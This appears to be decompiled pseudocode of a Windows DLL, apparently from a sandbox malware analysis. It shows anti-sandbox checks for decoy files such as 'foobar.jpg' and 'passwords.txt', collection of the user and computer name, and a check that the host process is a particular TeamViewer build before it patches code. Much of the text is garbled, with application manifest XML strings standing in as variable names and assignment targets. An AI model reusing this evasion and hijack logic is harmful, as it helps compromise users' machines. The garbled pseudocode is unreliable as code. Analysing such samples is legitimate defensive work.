                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t266);
                                                                                                                        					}
                                                                                                                        					_t267 = M6F340528; // 0xa53e68
                                                                                                                        					__eflags = _t267;
                                                                                                                        					if(_t267 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t267);
                                                                                                                        					}
                                                                                                                        					_t268 = M6F340530; // 0xa32c28
                                                                                                                        					__eflags = _t268;
                                                                                                                        					if(_t268 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t268);
                                                                                                                        					}
                                                                                                                        					_t269 = M6F340534; // 0xa563b0
                                                                                                                        					__eflags = _t269;
                                                                                                                        					if(_t269 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t269);
                                                                                                                        					}
                                                                                                                        					_t270 = M6F3404F8; // 0xa56660
                                                                                                                        					__eflags = _t270;
                                                                                                                        					if(_t270 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t270);
                                                                                                                        					}
                                                                                                                        					_t271 = M6F340504; // 0xa59868
                                                                                                                        					__eflags = _t271;
                                                                                                                        					if(_t271 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t271);
                                                                                                                        					}
                                                                                                                        					_t272 = M6F3404F4; // 0xa55c48
                                                                                                                        					__eflags = _t272;
                                                                                                                        					if(_t272 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t272);
                                                                                                                        					}
                                                                                                                        					_t273 = M6F340500; // 0xa45a70
                                                                                                                        					__eflags = _t273;
                                                                                                                        					if(_t273 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t273);
                                                                                                                        					}
                                                                                                                        					_t274 = M6F3404CC; // 0xa32d38
                                                                                                                        					__eflags = _t274;
                                                                                                                        					if(_t274 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t274);
                                                                                                                        					}
                                                                                                                        					_t275 = M6F3404D0; // 0xa58418
                                                                                                                        					__eflags = _t275;
                                                                                                                        					if(_t275 != 0) {
                                                                                                                        						HeapFree(GetProcessHeap(), 0, _t275);
                                                                                                                        					}
                                                                                                                        					__eflags = "\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x1
                                                                                                                        					if(__eflags != 0) {
                                                                                                                        						_t277 = M6F3404A8; // 0x6f240000
                                                                                                                        						__eflags = _t277;
                                                                                                                        						if(_t277 != 0) {
                                                                                                                        							FreeLibrary(_t277);
                                                                                                                        						}
                                                                                                                        						_t278 = M6F340490; // 0x770a0000
                                                                                                                        						__eflags = _t278;
                                                                                                                        						if(_t278 != 0) {
                                                                                                                        							FreeLibrary(_t278);
                                                                                                                        						}
                                                                                                                        						_t279 = M6F340494; // 0x748e0000
                                                                                                                        						__eflags = _t279;
                                                                                                                        						if(_t279 != 0) {
                                                                                                                        							FreeLibrary(_t279);
                                                                                                                        						}
                                                                                                                        						_t280 = M6F340498; // 0x76130000
                                                                                                                        						__eflags = _t280;
                                                                                                                        						if(_t280 != 0) {
                                                                                                                        							FreeLibrary(_t280);
                                                                                                                        						}
                                                                                                                        						_t281 = M6F34049C; // 0x73c30000
                                                                                                                        						__eflags = _t281;
                                                                                                                        						if(_t281 != 0) {
                                                                                                                        							FreeLibrary(_t281);
                                                                                                                        						}
                                                                                                                        						_t282 = M6F3404A0; // 0x773a0000
                                                                                                                        						__eflags = _t282;
                                                                                                                        						if(_t282 != 0) {
                                                                                                                        							FreeLibrary(_t282);
                                                                                                                        						}
                                                                                                                        						_t283 = M6F3404A4; // 0x70950000
                                                                                                                        						__eflags = _t283;
                                                                                                                        						if(_t283 != 0) {
                                                                                                                        							FreeLibrary(_t283);
                                                                                                                        						}
                                                                                                                        						_t284 =  *0x6f34047c; // 0xa545e0
                                                                                                                        						__eflags = _t284;
                                                                                                                        						if(_t284 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t284);
                                                                                                                        						}
                                                                                                                        						_t285 = M6F3404D4; // 0xa45f28
                                                                                                                        						__eflags = _t285;
                                                                                                                        						if(_t285 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t285);
                                                                                                                        						}
                                                                                                                        						_t286 = M6F3404DC; // 0xa55ca8
                                                                                                                        						__eflags = _t286;
                                                                                                                        						if(_t286 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t286);
                                                                                                                        						}
                                                                                                                        						_t287 = M6F3404D8; // 0xa55cd8
                                                                                                                        						__eflags = _t287;
                                                                                                                        						if(_t287 != 0) {
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t287);
                                                                                                                        						}
                                                                                                                        						_t288 = M6F3404F0; // 0xa54ab0
                                                                                                                        						__eflags = _t288;
                                                                                                                        						if(_t288 != 0) {
                                                                                                                        							LocalFree(_t288);
                                                                                                                        						}
                                                                                                                        						__eflags = M6F340614 - 2;
                                                                                                                        						if(M6F340614 == 2) {
                                                                                                                        							E6F33B840(0);
                                                                                                                        						}
                                                                                                                        						__eflags = M6F340614; // 0x2
                                                                                                                        						if(__eflags > 0) {
                                                                                                                        							E6F33B510();
                                                                                                                        						}
                                                                                                                        						_t598 = 0x6f34046c;
                                                                                                                        						do {
                                                                                                                        							_t289 =  *_t598;
                                                                                                                        							__eflags = _t289;
                                                                                                                        							if(_t289 != 0) {
                                                                                                                        								CloseHandle(_t289);
                                                                                                                        							}
                                                                                                                        							_t598 =  &(_t598[1]);
                                                                                                                        							__eflags = _t598 - 0x6f340478;
                                                                                                                        						} while (_t598 < 0x6f340478);
                                                                                                                        						_t290 = M6F340510; // 0x360
                                                                                                                        						__eflags = _t290;
                                                                                                                        						if(_t290 != 0) {
                                                                                                                        							NtTerminateThread(_t290, 0);
                                                                                                                        							_t541 = M6F340510; // 0x360
                                                                                                                        							CloseHandle(_t541);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					goto L131;
                                                                                                                        				} else {
                                                                                                                        					if(_t262 != 1) {
                                                                                                                        						L131:
                                                                                                                        						return 1;
                                                                                                                        					} else {
                                                                                                                        						DisableThreadLibraryCalls(_a4);
                                                                                                                        						"<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = GetModuleHandleA(0);
                                                                                                                        						_v928 = 0;
                                                                                                                        						_t343 = HeapAlloc(GetProcessHeap(), 8, 0x105);
                                                                                                                        						"on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t343;
                                                                                                                        						if(GetSystemDirectoryA(_t343, 0x105) == 0) {
                                                                                                                        							ExitProcess(0);
                                                                                                                        						}
                                                                                                                        						_t502 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa4de08
                                                                                                                        						PathAddBackslashA(_t502); // executed
                                                                                                                        						_t347 = HeapAlloc(GetProcessHeap(), 8, 0x105);
                                                                                                                        						"     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t347;
                                                                                                                        						M6F34052C = GetModuleFileNameA(_a4, _t347, 0x104);
                                                                                                                        						_t350 = HeapAlloc(GetProcessHeap(), 8, 0x105);
                                                                                                                        						_t503 = M6F34052C; // 0x33
                                                                                                                        						_t543 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        						M6F340524 = _t350;
                                                                                                                        						RtlMoveMemory(_t350, _t543, _t503);
                                                                                                                        						_t351 = M6F340524; // 0xa56118
                                                                                                                        						_t352 = E6F33A360(_t351, 0, 0);
                                                                                                                        						_t504 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        						M6F340528 = _t352;
                                                                                                                        						PathRemoveFileSpecA(_t504);
                                                                                                                        						_t544 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        						PathAddBackslashA(_t544);
                                                                                                                        						_t355 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        						SetCurrentDirectoryA(_t355);
                                                                                                                        						_t505 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        						_t357 = E6F33A360(_t505, 0, 0);
                                                                                                                        						_t611 =  &_v936 + 0x18;
                                                                                                                        						M6F340520 = _t357; // executed
                                                                                                                        						__imp__SHGetSpecialFolderPathA(0,  &_v276, 0, 0); // executed
                                                                                                                        						if(_t357 != 0) {
                                                                                                                        							PathAddBackslashA( &_v292);
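                                                                                                                        							_v948 = 0x626f6f66; // "foob" (ASCII bytes, little-endian)
                                                                                                                        							_v944 = 0x6a2e7261; // "ar.j"
                                                                                                                        							_v940 = 0x6770; // "pg"
                                                                                                                        							_v938 = 0; // NUL terminator; the stack string reads "foobar.jpg"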
                                                                                                                        							wsprintfA( &_v556, "%s%s",  &_v292,  &_v948);
                                                                                                                        							_t633 = _t611 + 0x10;
                                                                                                                        							_t489 = GetFileAttributesA( &_v548); // executed
                                                                                                                        							if(_t489 != 0xffffffff) {
                                                                                                                        								ExitProcess(0);
                                                                                                                        							}
                                                                                                                        							_v956 = 0x74646f2e; // ".odt" (ASCII bytes, little-endian)
                                                                                                                        							_v952 = 0; // NUL terminator
                                                                                                                        							wsprintfA( &_v548, "%s%s%s",  &_v284,  &_v940,  &_v956);
                                                                                                                        							_t611 = _t633 + 0x14;
                                                                                                                        							_t493 = GetFileAttributesA( &_v540); // executed
                                                                                                                        							if(_t493 != 0xffffffff) {
                                                                                                                        								_v947 = 0x7472; // "rt" (ASCII bytes, little-endian)
                                                                                                                        								_v945 = 0x66; // "f"; together "rtf"
                                                                                                                        								wsprintfA( &_v540, "%s%s%s",  &_v276,  &_v932,  &_v948);
                                                                                                                        								_t611 = _t611 + 0x14;
                                                                                                                        								if(GetFileAttributesA( &_v532) != 0xffffffff) {
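                                                                                                                        									_v844 = 0x73736170; // "pass" (ASCII bytes, little-endian)
                                                                                                                        									_v840 = 0x64726f77; // "word"
                                                                                                                        									_v836 = 0x73; // "s"; the stack string reads "passwords"
                                                                                                                        									_v939 = 0x7874; // "tx"
                                                                                                                        									_v937 = 0x74; // "t"; together "txt"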
                                                                                                                        									wsprintfA( &_v532, "%s%s%s",  &_v268,  &_v844,  &_v940);
                                                                                                                        									_t611 = _t611 + 0x14;
                                                                                                                        									if(GetFileAttributesA( &_v524) == 0xffffffff) {
                                                                                                                        										goto L11;
                                                                                                                        									} else {
                                                                                                                        										ExitProcess(0);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						L11:
                                                                                                                        						_t359 = HeapAlloc(GetProcessHeap(), 8, 0x105);
                                                                                                                        						M6F340530 = _t359;
                                                                                                                        						_t360 = GetModuleFileNameA(0, _t359, 0x104);
                                                                                                                        						_t546 = M6F340530; // 0xa32c28
                                                                                                                        						M6F340538 = _t360;
                                                                                                                        						M6F34053C = PathFindFileNameA(_t546);
                                                                                                                        						_t362 = M6F340530; // 0xa32c28
                                                                                                                        						_t363 = E6F33A360(_t362, 0, 0);
                                                                                                                        						M6F340534 = _t363;
                                                                                                                        						L6F33C2EE();
                                                                                                                        						 *0x6f340278 = 0x11c;
                                                                                                                        						L6F33C34E();
                                                                                                                        						M6F340548 = E6F333280(0);
                                                                                                                        						_t365 = E6F333220(0);
                                                                                                                        						_t613 = _t611 + 0x14;
                                                                                                                        						M6F340544 = _t365;
                                                                                                                        						__imp__WTSGetActiveConsoleSessionId(0x6f340278, 0x6f340278, 0x11c);
                                                                                                                        						M6F3404E8 = _t365;
                                                                                                                        						_t366 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x400000
                                                                                                                        						if( *_t366 != 0x5a4d) { // 0x5a4d = "MZ" (DOS header signature)
                                                                                                                        							goto L131;
                                                                                                                        						} else {
                                                                                                                        							_t39 = _t366 + 0x3c; // 0x100
                                                                                                                        							_t601 =  *_t39 + _t366;
                                                                                                                        							if( *_t601 != 0x4550) { // 0x4550 = "PE\0\0" (NT header signature)
                                                                                                                        								goto L131;
                                                                                                                        							} else {
                                                                                                                        								_v860 =  *((intOrPtr*)(_t601 + 0x58));
                                                                                                                        								_v976 =  *(_t601 + 8);
                                                                                                                        								_v844 = 0x104;
                                                                                                                        								_t369 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
                                                                                                                        								M6F3404F8 = _t369;
                                                                                                                        								if(_t369 != 0) {
                                                                                                                        									_t483 = GetUserNameW(_t369,  &_v844); // executed
                                                                                                                        									if(_t483 == 0) {
                                                                                                                        										_t484 = M6F3404F8; // 0xa56660
                                                                                                                        										 *_t484 = 0;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_v856 = 0x104;
                                                                                                                        								_t371 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
                                                                                                                        								M6F340504 = _t371;
                                                                                                                        								if(_t371 != 0) {
                                                                                                                        									__imp__GetComputerNameExW(3, _t371,  &_v856); // executed
                                                                                                                        									_t371 = M6F340504; // 0xa59868
                                                                                                                        									if(_t371 == 0) {
                                                                                                                        										 *_t371 = 0;
                                                                                                                        										_t371 = M6F340504; // 0xa59868
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_t507 = M6F3404F8; // 0xa56660
                                                                                                                        								if(_t507 != 0) {
                                                                                                                        									M6F3404F4 = E6F33A2F0(_t507, 0, 0);
                                                                                                                        									_t371 = M6F340504; // 0xa59868
                                                                                                                        									_t613 = _t613 + 0xc;
                                                                                                                        								}
                                                                                                                        								if(_t371 != 0) {
                                                                                                                        									_t481 = E6F33A2F0(_t371, 0, 0);
                                                                                                                        									_t613 = _t613 + 0xc;
                                                                                                                        									M6F340500 = _t481;
                                                                                                                        								}
                                                                                                                        								_t373 = HeapAlloc(GetProcessHeap(), 8, 0x105);
                                                                                                                        								M6F3404CC = _t373;
                                                                                                                        								if(_t373 != 0) {
                                                                                                                        									_t531 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        									wsprintfA(_t373, "%s%s%s", _t531, "TeamViewer", ".ini");
                                                                                                                        									_t576 = M6F3404CC; // 0xa32d38
                                                                                                                        									_t480 = E6F33A360(_t576, 0, 0);
                                                                                                                        									_t613 = _t613 + 0x20;
                                                                                                                        									M6F3404D0 = _t480;
                                                                                                                        								}
                                                                                                                        								if(_v860 == 0x435a88 || _v976 == 0x4b4ca51f) {
                                                                                                                        									_push( &M6F3404F0);
                                                                                                                        									"\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = 1;
                                                                                                                        									M6F3404AC = E6F333390();
                                                                                                                        									_t375 = E6F331D50(0x77d938, _t601);
                                                                                                                        									M6F340580 = _t375;
                                                                                                                        									M6F340518 = _t375;
                                                                                                                        									M6F34054C = E6F331D50(0x7b16d4, _t601);
                                                                                                                        									M6F340570 = E6F331D50(0x7b7db0, _t601);
